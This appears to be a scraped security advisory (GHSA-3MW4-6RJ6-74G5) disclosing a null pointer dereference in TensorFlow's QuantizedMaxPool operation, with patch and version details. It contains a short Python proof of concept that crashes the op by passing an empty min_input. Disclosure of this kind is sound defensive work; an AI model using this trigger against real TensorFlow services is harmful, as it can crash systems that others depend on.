Lucene search

K
osvGoogleOSV:GHSA-3MW4-6RJ6-74G5
HistoryFeb 09, 2022 - 11:46 p.m.

Null pointer dereference in TensorFlow

2022-02-0923:46:46
Google
osv.dev
18
tensorflow
quantizedmaxpool
user controlled inputs
vulnerability
patches
github commit
version
security guide
faysal hossain shezan

EPSS

0.002

Percentile

51.9%

Impact

The implementation of QuantizedMaxPool has an undefined behavior where user controlled inputs can trigger a reference binding to null pointer.

import tensorflow as tf

tf.raw_ops.QuantizedMaxPool(
    input = tf.constant([[[[4]]]], dtype=tf.quint8),
    min_input = [],
    max_input = [1],
    ksize = [1, 1, 1, 1],
    strides = [1, 1, 1, 1],
    padding = "SAME", name=None
)

Patches

We have patched the issue in GitHub commit 53b0dd6dc5957652f35964af16b892ec9af4a559.

The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Faysal Hossain Shezan from University of Virginia.

EPSS

0.002

Percentile

51.9%

Related for OSV:GHSA-3MW4-6RJ6-74G5